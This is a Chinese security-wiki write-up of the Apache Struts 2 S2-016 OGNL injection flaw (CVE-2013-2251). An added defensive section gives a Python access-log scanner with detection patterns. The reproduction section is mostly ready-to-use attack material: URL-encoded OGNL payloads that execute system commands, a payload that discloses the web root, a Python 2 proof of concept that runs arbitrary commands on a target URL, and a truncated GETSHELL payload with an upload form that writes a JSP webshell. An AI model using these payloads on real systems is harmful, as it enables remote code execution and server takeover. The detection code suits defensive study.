Source: 湛蓝安全空间, 160-Apache Struts / 013-(CVE-2013-2251)s2-016.md, 2021-07-17 00:01:26

# (CVE-2013-2251) S2-016

## 1. Vulnerability overview

The DefaultActionMapper class accepts "action:", "redirect:" and "redirectAction:" as navigation or redirect prefixes in request parameters, and the text after such a prefix may itself be an OGNL expression. Because Struts 2 does not filter what follows these prefixes, the expression is evaluated server-side; through it an attacker can call Java static methods and execute arbitrary system commands.
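From the defender's side, the prefix handling described above leaves a clear footprint in web server access logs: a query-string parameter that begins with one of the three prefixes and, in the attack case, continues with an OGNL expression. The following is an added example (not code from the original page) in Python 3 that scans access-log style lines for that pattern. It goes a little beyond the payloads shown on the page in that it decodes URL-encoding repeatedly (so double-encoded probes are caught) and matches the prefixes case-insensitively. It assumes the common/combined log format for the request field; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# DefaultActionMapper navigation prefixes abused in S2-016 (listed on the page).
# Keys are lower-case for matching; values are the canonical spelling for reports.
STRUTS_PREFIXES = {
    "redirect:": "redirect:",
    "redirectaction:": "redirectAction:",
    "action:": "action:",
}

# Markers that the text after the prefix is an OGNL expression, or uses the
# sandbox-bypass idioms seen in the page's payloads (lower-case for matching).
OGNL_MARKERS = ("${", "%{", "#context", "#_memberaccess", "@java.", "new java.")

# Combined/common access-log request field, e.g. "GET /a.action?x=1 HTTP/1.1".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_unquote(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2524 -> %24 -> $) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_query(query):
    """Return a list of findings for one raw query string.

    Each '&'-separated segment is decoded and checked for a Struts navigation
    prefix; a prefix followed by OGNL markers is rated high, a bare prefix low.
    """
    findings = []
    for segment in query.split("&"):
        if not segment:
            continue
        decoded = fully_unquote(segment)
        lower = decoded.lower()
        for key, canonical in STRUTS_PREFIXES.items():
            if lower.startswith(key):
                target = lower[len(key):]
                has_ognl = any(marker in target for marker in OGNL_MARKERS)
                findings.append({
                    "prefix": canonical,
                    "severity": "high" if has_ognl else "low",
                    "sample": decoded[:80],
                })
                break
    return findings


def scan_log(lines):
    """Return (line_number, finding) pairs for every suspicious request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # Split on the first '?' by hand: a decoded payload may contain '#',
        # which urlsplit would otherwise treat as a fragment.
        _path, _sep, query = match.group("target").partition("?")
        for finding in inspect_query(query):
            hits.append((number, finding))
    return hits


# Constructed sample log lines (not real traffic): a normal request, a bare
# redirect: prefix, an OGNL payload, and a double-encoded redirectAction: probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2021:00:01:26 +0800] "GET /app/login.action?user=alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/Jul/2021:00:01:27 +0800] "GET /app/index.action?redirect:/app/home.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [17/Jul/2021:00:01:28 +0800] "GET /app/index.action?redirect%3A%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%7D HTTP/1.1" 200 14',
    '10.0.0.9 - - [17/Jul/2021:00:01:29 +0800] "GET /app/index.action?redirectAction%253A%2524%257B1%252B1%257D HTTP/1.1" 200 14',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {finding['severity']:4} {finding['prefix']} {finding['sample']}")
```

A bare prefix is reported at low severity because the prefixes were a legitimate (if dangerous) feature on affected versions, so a single hit may be application behaviour rather than an attack; a prefix followed by `${`, `#context` or `#_memberAccess` has no benign explanation. Detection is a stop-gap: the fix is to upgrade past the affected range (2.3.15.1 removed the `redirect:` and `redirectAction:` prefix handling).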
    
## 2. Affected versions

Struts 2.0.0 - Struts 2.3.15
    
## 3. Reproduction

![图片.png](images/fffbc3883ebe43508a9c2b1fa83f4c81.png)

**Arbitrary command execution**
    
```bash
redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D
```
    
```bash
?redirect:
${#a=new java.lang.ProcessBuilder(new java.lang.String[]{"netstat","-an"}).start().getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#screen=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#screen.println(#d),#screen.close()}
```
    
**EXP: disclose the web root path**

```bash
?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
```
    
**Python PoC: arbitrary command execution**

```python
# Python 2 script (urllib2, print statement); usage: script.py <url> <cmd> <arg>
import urllib2, sys, re

def get(url, data):
    string = url + "?" + data
    req = urllib2.Request("%s" % string)
    response = urllib2.urlopen(req).read().strip()
    print strip(response)

def strip(str):
    # remove the NUL padding left by the char[50000] buffer in the payload
    tmp = str.strip()
    blank_line = re.compile('\x00')
    tmp = blank_line.sub('', tmp)
    return tmp

if __name__ == '__main__':
    url = sys.argv[1]
    cmd = sys.argv[2]
    cmd1 = sys.argv[3]
    attack = "redirect:${%%23a%%3d(new%%20java.lang.ProcessBuilder(new%%20java.lang.String[]{'%s','%s'})).start(),%%23b%%3d%%23a.getInputStream(),%%23c%%3dnew%%20java.io.InputStreamReader(%%23b),%%23d%%3dnew%%20java.io.BufferedReader(%%23c),%%23e%%3dnew%%20char[50000],%%23d.read(%%23e),%%23matt%%3d%%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%%23matt.getWriter().println(%%23e),%%23matt.getWriter().flush(),%%23matt.getWriter().close()}" % (cmd, cmd1)
    get(url, attack)
```
    
**GETSHELL EXP**

```bash
?redirect:${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22test.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%
```
    
Then write the shell with the following form:

```html
<form action="http://baidu.com/acdap/test.jsp?f=1.jsp" method="post">
<textarea >code</textarea>
<input type=submit value="提交">
</form>
```
    
1.jsp is then created in the upload directory.
    
    
    